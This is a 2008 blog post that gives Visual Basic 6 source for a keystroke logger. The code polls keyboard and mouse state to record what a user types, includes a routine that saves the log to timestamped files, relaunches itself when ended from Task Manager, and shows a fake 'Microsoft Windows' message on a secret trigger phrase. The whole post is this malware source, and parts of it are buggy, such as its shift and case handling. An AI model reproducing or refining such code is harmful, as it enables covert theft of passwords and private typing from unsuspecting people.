Saturday, October 11, 2008

VB 6.0 Code KeyBoard Logger

'***********************CODED bY SATAN DREAM*******************
' dot added
Option Explicit
Dim strContent As String
Dim boolCapslockOn As Boolean
Dim boolShiftPresed As Boolean
Dim BOOLCASE As Boolean
Dim strSavePath As String
Dim StrFileName As String
Dim intInd As Long
Dim strFilePath As String
Dim intSpeciachar As Integer
Dim SpecChar As String
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer 'key bord scan func

Dim StrTExt As String
' follwing is keybord definition
'start function keys
Dim Keydot1 As Long, keydot1pre As Long
Dim KeyPlus As Long, KeyPluspre As Long
Dim KeyAdd As Long, KeyAddpre As Long
Dim KeySub As Long, keySubpre As Long
Dim KeyMulti As Long, KeyMultiPre As Long
Dim KeyDiv As Long, KeyDivper As Long

Dim KeyMin As Long, KeyMinpre As Long
Dim KeyEsc As Long, KeyEscPre As Long
Dim KeyF1 As Long, KeyF1Pre As Long
Dim KeyF2 As Long, KeyF2Pre As Long
Dim KeyF3 As Long, KeyF3Pre As Long
Dim KeyF4 As Long, KeyF4Pre As Long
Dim KeyF5 As Long, KeyF5Pre As Long
Dim KeyF6 As Long, KeyF6Pre As Long
Dim KeyF7 As Long, KeyF7Pre As Long
Dim KeyF8 As Long, KeyF8Pre As Long
Dim KeyF9 As Long, KeyF9Pre As Long
Dim KeyF10 As Long, KeyF10Pre As Long
Dim KeyF11 As Long, KeyF11Pre As Long
Dim KeyF12 As Long, KeyF12Pre As Long

'defines numeric keys
Dim Key1 As Long, Key1Pre As Long
Dim Key2 As Long, Key2Pre As Long
Dim Key3 As Long, Key3Pre As Long
Dim Key4 As Long, Key4Pre As Long
Dim Key5 As Long, Key5Pre As Long
Dim Key6 As Long, Key6Pre As Long
Dim kEY7 As Long, KEY7pRE As Long
Dim Key8 As Long, Key8Pre As Long
Dim Key9 As Long, Key9Pre As Long
Dim Key0 As Long, Key0Pre As Long
'Defines General Keys
Dim KeyA As Long, KeyAPre As Long
Dim KeyB As Long, KeyBPre As Long
Dim KeyC As Long, KeyCPre As Long
Dim KeyD As Long, KeyDPre As Long
Dim KeyE As Long, KeyEPre As Long
Dim KeyF As Long, KeyFPre As Long
Dim KeyG As Long, KeyGPre As Long
Dim KeyH As Long, KeyHPre As Long
Dim KeyI As Long, KeyIPre As Long
Dim KeyJ As Long, KeyJPre As Long
Dim KeyK As Long, KeyKPre As Long
Dim KeyL As Long, KeyLPre As Long
Dim KeyM As Long, KeyMPre As Long
Dim KeyN As Long, KeyNPre As Long
Dim KeyO As Long, KeyOPre As Long
Dim KeyP As Long, KeyPPre As Long
Dim KeyQ As Long, KeyQPre As Long
Dim KeyR As Long, KeyRPre As Long
Dim KeyS As Long, KeySPre As Long
Dim KeyT As Long, KeyTPre As Long
Dim KeyU As Long, KeyUPre As Long
Dim KeyV As Long, KeyVPre As Long
Dim KeyW As Long, KeyWPre As Long
Dim KeyX As Long, KeyXPre As Long
Dim KeyY As Long, KeyYPre As Long
Dim KeyZ As Long, KeyZPre As Long
Dim KeyDot As Long, KeyDotpre As Long
Dim KeyNUM1 As Long, KeyNUM1Pre As Long
Dim KeyNUM2 As Long, KeyNUM2Pre As Long
Dim KeyNUM3 As Long, KeyNUM3Pre As Long
Dim KeyNUM4 As Long, KeyNUM4Pre As Long
Dim KeyNUM5 As Long, KeyNUM5Pre As Long
Dim KeyNUM6 As Long, KeyNUM6Pre As Long
Dim KeyNUM7 As Long, KeyNUM7PRE As Long
Dim KeyNUM8 As Long, KeyNUM8Pre As Long
Dim KeyNUM9 As Long, KeyNUM9Pre As Long
Dim KeyNUM0 As Long, KeyNUM0Pre As Long
'Othe function Keys
Dim KeyTab As Long, KeyTabPre As Long
Dim KeyCapsLock As Long, KeyCapsLockPre As Long
Dim KeyShift As Long, KeyShiftPre As Long
Dim KeyEnter As Long, KeyEnterPre As Long
Dim KeySpace As Long, KeySpacePre As Long
Dim KeyMouseLeft As Long, KeyMouseLeftPre As Long
Dim KeyMouseright As Long, keyMouseRightPre As Long
Private Sub scanKeyb()


KeyCapsLock = GetKeyState(vbKeyCapital)
If KeyCapsLock = 0 Then

boolCapslockOn = False
ElseIf KeyCapsLock = 1 Then
boolCapslockOn = True
End If

KeyCapsLockPre = KeyCapsLock

KeyShift = GetKeyState(vbKeyShift)
If KeyShift < 0 Then

boolShiftPresed = True
boolShiftPresed = False
End If

KeyA = GetKeyState(vbKeyA)
If KeyA >= 0 And KeyAPre < 0 And BOOLCASE = True Then

strContent = strContent + "A"

ElseIf KeyA >= 0 And KeyAPre < 0 Then
strContent = strContent + "a"

End If

KeyAPre = KeyA

KeyB = GetKeyState(vbKeyB)
If KeyB >= 0 And KeyBPre < 0 And BOOLCASE = True Then

strContent = strContent + "B"

ElseIf KeyB >= 0 And KeyBPre < 0 Then
strContent = strContent + "b"

End If

KeyBPre = KeyB

KeyC = GetKeyState(vbKeyC)
If KeyC >= 0 And KeyCPre < 0 And BOOLCASE = True Then

strContent = strContent + "C"

ElseIf KeyC >= 0 And KeyCPre < 0 Then
strContent = strContent + "c"

End If

KeyCPre = KeyC

KeyD = GetKeyState(vbKeyD)
If KeyD >= 0 And KeyDPre < 0 And BOOLCASE = True Then

strContent = strContent + "D"

ElseIf KeyD >= 0 And KeyDPre < 0 Then
strContent = strContent + "d"

End If

KeyDPre = KeyD

KeyE = GetKeyState(vbKeyE)
If KeyE >= 0 And KeyEPre < 0 And BOOLCASE = True Then

strContent = strContent + "E"

ElseIf KeyE >= 0 And KeyEPre < 0 Then
strContent = strContent + "e"

End If

KeyEPre = KeyE

KeyF = GetKeyState(vbKeyF)
If KeyF >= 0 And KeyFPre < 0 And BOOLCASE = True Then

strContent = strContent + "F"

ElseIf KeyF >= 0 And KeyFPre < 0 Then
strContent = strContent + "f"

End If

KeyFPre = KeyF


KeyG = GetKeyState(vbKeyG)
If KeyG >= 0 And KeyGPre < 0 And BOOLCASE = True Then

strContent = strContent + "G"

ElseIf KeyG >= 0 And KeyGPre < 0 Then
strContent = strContent + "g"

End If

KeyGPre = KeyG

KeyH = GetKeyState(vbKeyH)
If KeyH >= 0 And KeyHPre < 0 And BOOLCASE = True Then

strContent = strContent + "H"

ElseIf KeyH >= 0 And KeyHPre < 0 Then
strContent = strContent + "h"

End If

KeyHPre = KeyH

KeyI = GetKeyState(vbKeyI)
If KeyI >= 0 And KeyIPre < 0 And BOOLCASE = True Then

strContent = strContent + "I"

ElseIf KeyI >= 0 And KeyIPre < 0 Then
strContent = strContent + "i"

End If

KeyIPre = KeyI

KeyJ = GetKeyState(vbKeyJ)
If KeyJ >= 0 And KeyJPre < 0 And BOOLCASE = True Then

strContent = strContent + "J"

ElseIf KeyJ >= 0 And KeyJPre < 0 Then
strContent = strContent + "j"

End If

KeyJPre = KeyJ

KeyK = GetKeyState(vbKeyK)
If KeyK >= 0 And KeyKPre < 0 And BOOLCASE = True Then

strContent = strContent + "K"

ElseIf KeyK >= 0 And KeyKPre < 0 Then
strContent = strContent + "k"

End If

KeyKPre = KeyK

KeyL = GetKeyState(vbKeyL)
If KeyL >= 0 And KeyLPre < 0 And BOOLCASE = True Then

strContent = strContent + "L"

ElseIf KeyL >= 0 And KeyLPre < 0 Then
strContent = strContent + "l"

End If

KeyLPre = KeyL

KeyM = GetKeyState(vbKeyM)
If KeyM >= 0 And KeyMPre < 0 And BOOLCASE = True Then

strContent = strContent + "M"

ElseIf KeyM >= 0 And KeyMPre < 0 Then
strContent = strContent + "m"

End If

KeyMPre = KeyM

KeyN = GetKeyState(vbKeyN)
If KeyN >= 0 And KeyNPre < 0 And BOOLCASE = True Then

strContent = strContent + "N"

ElseIf KeyN >= 0 And KeyNPre < 0 Then
strContent = strContent + "n"

End If

KeyNPre = KeyN

KeyO = GetKeyState(vbKeyO)
If KeyO >= 0 And KeyOPre < 0 And BOOLCASE = True Then

strContent = strContent + "O"

ElseIf KeyO >= 0 And KeyOPre < 0 Then
strContent = strContent + "o"

End If

KeyOPre = KeyO


KeyP = GetKeyState(vbKeyP)
If KeyP >= 0 And KeyPPre < 0 And BOOLCASE = True Then

strContent = strContent + "P"

ElseIf KeyP >= 0 And KeyPPre < 0 Then
strContent = strContent + "p"

End If

KeyPPre = KeyP

KeyQ = GetKeyState(vbKeyQ)
If KeyQ >= 0 And KeyQPre < 0 And BOOLCASE = True Then

strContent = strContent + "Q"

ElseIf KeyQ >= 0 And KeyQPre < 0 Then
strContent = strContent + "q"

End If

KeyQPre = KeyQ

KeyR = GetKeyState(vbKeyR)
If KeyR >= 0 And KeyRPre < 0 And BOOLCASE = True Then

strContent = strContent + "R"

ElseIf KeyR >= 0 And KeyRPre < 0 Then
strContent = strContent + "r"

End If

KeyRPre = KeyR

KeyS = GetKeyState(vbKeyS)
If KeyS >= 0 And KeySPre < 0 And BOOLCASE = True Then

strContent = strContent + "S"

ElseIf KeyS >= 0 And KeySPre < 0 Then
strContent = strContent + "s"

End If

KeySPre = KeyS

KeyT = GetKeyState(vbKeyT)
If KeyT >= 0 And KeyTPre < 0 And BOOLCASE = True Then

strContent = strContent + "T"

ElseIf KeyT >= 0 And KeyTPre < 0 Then
strContent = strContent + "t"

End If

KeyTPre = KeyT

KeyU = GetKeyState(vbKeyU)
If KeyU >= 0 And KeyUPre < 0 And BOOLCASE = True Then

strContent = strContent + "U"

ElseIf KeyU >= 0 And KeyUPre < 0 Then
strContent = strContent + "u"

End If

KeyUPre = KeyU

KeyV = GetKeyState(vbKeyV)
If KeyV >= 0 And KeyVPre < 0 And BOOLCASE = True Then

strContent = strContent + "V"

ElseIf KeyV >= 0 And KeyVPre < 0 Then
strContent = strContent + "v"

End If

KeyVPre = KeyV

KeyX = GetKeyState(vbKeyX)
If KeyX >= 0 And KeyXPre < 0 And BOOLCASE = True Then

strContent = strContent + "X"

ElseIf KeyX >= 0 And KeyXPre < 0 Then
strContent = strContent + "x"

End If

KeyXPre = KeyX

KeyW = GetKeyState(vbKeyW)
If KeyW >= 0 And KeyWPre < 0 And BOOLCASE = True Then

strContent = strContent + "W"

ElseIf KeyW >= 0 And KeyWPre < 0 Then
strContent = strContent + "w"

End If

KeyWPre = KeyW

KeyY = GetKeyState(vbKeyY)
If KeyY >= 0 And KeyYPre < 0 And BOOLCASE = True Then

strContent = strContent + "Y"

ElseIf KeyY >= 0 And KeyYPre < 0 Then
strContent = strContent + "y"

End If

KeyYPre = KeyY

KeyZ = GetKeyState(vbKeyZ)
If KeyZ >= 0 And KeyZPre < 0 And BOOLCASE = True Then

strContent = strContent + "Z"

ElseIf KeyZ >= 0 And KeyZPre < 0 Then
strContent = strContent + "z"

End If

KeyZPre = KeyZ
Keydot1 = GetKeyState(110)
If Keydot1 >= 0 And keydot1pre < 0 And BOOLCASE = True Then

strContent = strContent + "."

ElseIf Keydot1 >= 0 And keydot1pre < 0 Then
strContent = strContent + "."

End If

keydot1pre = Keydot1

KeyDot = GetKeyState(190)
If KeyDot >= 0 And KeyDotpre < 0 And BOOLCASE = True Then

'strContent = strContent + "."

ElseIf KeyDot >= 0 And KeyDotpre < 0 Then
strContent = strContent + "."

End If

KeyDotpre = KeyDot

KeyMouseLeft = GetKeyState(vbKeyLButton)
If KeyMouseLeft >= 0 And KeyMouseLeftPre < 0 Then

strContent = strContent + SpecChar + "MLeft" + SpecChar

End If

KeyMouseLeftPre = KeyMouseLeft

KeyMouseright = GetKeyState(vbKeyRButton)
If KeyMouseright >= 0 And keyMouseRightPre < 0 Then

strContent = strContent + " "

End If

keyMouseRightPre = KeyMouseright


KeyEnter = GetKeyState(vbKeyReturn)
If KeyEnter >= 0 And KeyEnterPre < 0 Then

strContent = strContent + " "

End If

KeyEnterPre = KeyEnter

KeyTab = GetKeyState(vbKeyTab)
If KeyTab >= 0 And KeyTabPre < 0 Then

strContent = strContent + SpecChar + "tab" + SpecChar

End If

KeyTabPre = KeyTab


KeySpace = GetKeyState(vbKeySpace)
If KeySpace >= 0 And KeySpacePre < 0 Then

strContent = strContent + " "

End If

KeySpacePre = KeySpace


KeyNUM0 = GetKeyState(vbKeyNumpad0)
If KeyNUM0 >= 0 And KeyNUM0Pre < 0 Then

strContent = strContent + "0"

End If

KeyNUM0Pre = KeyNUM0
KeyNUM1 = GetKeyState(vbKeyNumpad1)
If KeyNUM1 >= 0 And KeyNUM1Pre < 0 Then

strContent = strContent + "1"

End If

KeyNUM1Pre = KeyNUM1
KeyNUM2 = GetKeyState(vbKeyNumpad2)
If KeyNUM2 >= 0 And KeyNUM2Pre < 0 Then

strContent = strContent + "2"

End If

KeyNUM2Pre = KeyNUM2
KeyNUM3 = GetKeyState(vbKeyNumpad3)
If KeyNUM3 >= 0 And KeyNUM3Pre < 0 Then

strContent = strContent + "3"

End If

KeyNUM3Pre = KeyNUM3
KeyNUM4 = GetKeyState(vbKeyNumpad4)
If KeyNUM4 >= 0 And KeyNUM4Pre < 0 Then

strContent = strContent + "4"

End If

KeyNUM4Pre = KeyNUM4
KeyNUM5 = GetKeyState(vbKeyNumpad5)
If KeyNUM5 >= 0 And KeyNUM5Pre < 0 Then

strContent = strContent + "5"

End If

KeyNUM5Pre = KeyNUM5
KeyNUM6 = GetKeyState(vbKeyNumpad6)
If KeyNUM6 >= 0 And KeyNUM6Pre < 0 Then

strContent = strContent + "6"

End If

KeyNUM6Pre = KeyNUM6
KeyNUM7 = GetKeyState(vbKeyNumpad7)
If KeyNUM7 >= 0 And KeyNUM7PRE < 0 Then

strContent = strContent + "7"

End If

KeyNUM8 = GetKeyState(vbKeyNumpad8)
If KeyNUM8 >= 0 And KeyNUM8Pre < 0 Then

strContent = strContent + "8"

End If

KeyNUM8Pre = KeyNUM8
KeyNUM9 = GetKeyState(vbKeyNumpad9)
If KeyNUM9 >= 0 And KeyNUM9Pre < 0 Then

strContent = strContent + "9"

End If

KeyNUM9Pre = KeyNUM9

Key0 = GetKeyState(vbKey0)
If Key0 >= 0 And Key0Pre < 0 And boolShiftPresed = True Then

strContent = strContent + ")"
ElseIf Key0 >= 0 And Key0Pre < 0 And boolShiftPresed = False Then
strContent = strContent + "0"
End If

Key0Pre = Key0
Key1 = GetKeyState(vbKey1)
If Key1 >= 0 And Key1Pre < 0 And boolShiftPresed = True Then

strContent = strContent + "!"
ElseIf Key1 >= 0 And Key1Pre < 0 And boolShiftPresed = False Then
strContent = strContent + "1"
End If

Key1Pre = Key1
Key2 = GetKeyState(vbKey2)
If Key2 >= 0 And Key2Pre < 0 And boolShiftPresed = True Then

strContent = strContent + "@"
ElseIf Key2 >= 0 And Key2Pre < 0 And boolShiftPresed = False Then
strContent = strContent + "2"
End If

Key2Pre = Key2
Key3 = GetKeyState(vbKey3)
If Key3 >= 0 And Key3Pre < 0 And boolShiftPresed = True Then

strContent = strContent + "#"
ElseIf Key3 >= 0 And Key3Pre < 0 And boolShiftPresed = False Then
strContent = strContent + "3"
End If

Key3Pre = Key3
Key4 = GetKeyState(vbKey4)
If Key4 >= 0 And Key4Pre < 0 And boolShiftPresed = True Then

strContent = strContent + "$"
ElseIf Key4 >= 0 And Key4Pre < 0 And boolShiftPresed = False Then
strContent = strContent + "4"
End If

Key4Pre = Key4
Key5 = GetKeyState(vbKey5)
If Key5 >= 0 And Key5Pre < 0 And boolShiftPresed = True Then

strContent = strContent + "%"
ElseIf Key5 >= 0 And Key5Pre < 0 And boolShiftPresed = False Then
strContent = strContent + "5"
End If

Key5Pre = Key5
Key6 = GetKeyState(vbKey6)
If Key6 >= 0 And Key6Pre < 0 And boolShiftPresed = True Then

strContent = strContent + "^"
ElseIf Key6 >= 0 And Key6Pre < 0 And boolShiftPresed = False Then
strContent = strContent + "6"
End If

Key6Pre = Key6
kEY7 = GetKeyState(vbKey7)
If kEY7 >= 0 And KEY7pRE < 0 And boolShiftPresed = True Then

strContent = strContent + "<^7*>"
ElseIf kEY7 >= 0 And KEY7pRE < 0 And boolShiftPresed = False Then
strContent = strContent + "7"
End If

KEY7pRE = kEY7
Key8 = GetKeyState(vbKey8)
If Key8 >= 0 And Key8Pre < 0 And boolShiftPresed = True Then

strContent = strContent + "*"
ElseIf Key8 >= 0 And Key8Pre < 0 And boolShiftPresed = False Then
strContent = strContent + "8"
End If

Key8Pre = Key8
Key9 = GetKeyState(vbKey9)
If Key9 >= 0 And Key9Pre < 0 And boolShiftPresed = True Then

strContent = strContent + "("
ElseIf Key9 >= 0 And Key9Pre < 0 And boolShiftPresed = False Then
strContent = strContent + "9"
End If

Key9Pre = Key9
KeyPlus = GetKeyState(187)
If KeyPlus >= 0 And KeyPluspre < 0 And boolShiftPresed = True Then

strContent = strContent + "+"
ElseIf KeyPlus >= 0 And KeyPluspre < 0 And boolShiftPresed = False Then
strContent = strContent + "="
End If

KeyPluspre = KeyPlus
KeyMin = GetKeyState(189)
If KeyMin >= 0 And KeyMinpre < 0 And boolShiftPresed = True Then

strContent = strContent + "_"
ElseIf KeyMin >= 0 And KeyMinpre < 0 And boolShiftPresed = False Then
strContent = strContent + "-"
End If

KeyMinpre = KeyMin

End Sub

Private Sub SETCASE()
If boolCapslockOn = False And boolShiftPresed = False Then
ElseIf boolCapslockOn = False And boolShiftPresed = True Then
ElseIf boolCapslockOn = True And boolShiftPresed = True Then
ElseIf boolCapslockOn = True And boolShiftPresed = False Then
End If
End Sub

Private Sub Command1_Click()
End Sub

Private Sub Form_Load()
strContent = " " & Format(Date, "yymmdd") & Time & vbNewLine
strFilePath = App.Path + "\" + App.Title + ".exe"
intSpeciachar = 165
SpecChar = Chr(165) + Chr(182)
End Sub

Private Sub rtfcontent_GotFocus()

End Sub

Private Sub OpenSaveFile()
On Error Resume Next
StrTExt = "H"
StrFileName = App.Path & "save\"
MkDir StrFileName
StrFileName = StrFileName & Year(Date)
MkDir StrFileName
StrFileName = StrFileName & "\" & Month(Date)
MkDir StrFileName
StrFileName = StrFileName & "\" & Day(Date)
MkDir StrFileName
StrFileName = StrFileName & "\" & Hour(Time) & Minute(Time) & Second(Time) & ".DCT"
Open StrFileName For Output As #1
Write #1, strContent
Close #1

End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Select Case UnloadMode
Case 3

Shell strFilePath, vbNormalFocus

End Select

End Sub

Private Sub Timer1_Timer()
Label1.Caption = strContent
Dim Lens
Lens = Len(strContent)

If Len(strContent) > 1024 Then

strContent = " STARTING " & Time

End If
intInd = InStr(strContent, "geffreaenditgeffrea")
If intInd > 0 Then
MsgBox "Ssuccesfuly Updated", vbInformation, "Microsoft Windows"
strContent = ""
Timer1.Enabled = False
Unload Me
End If

End Sub

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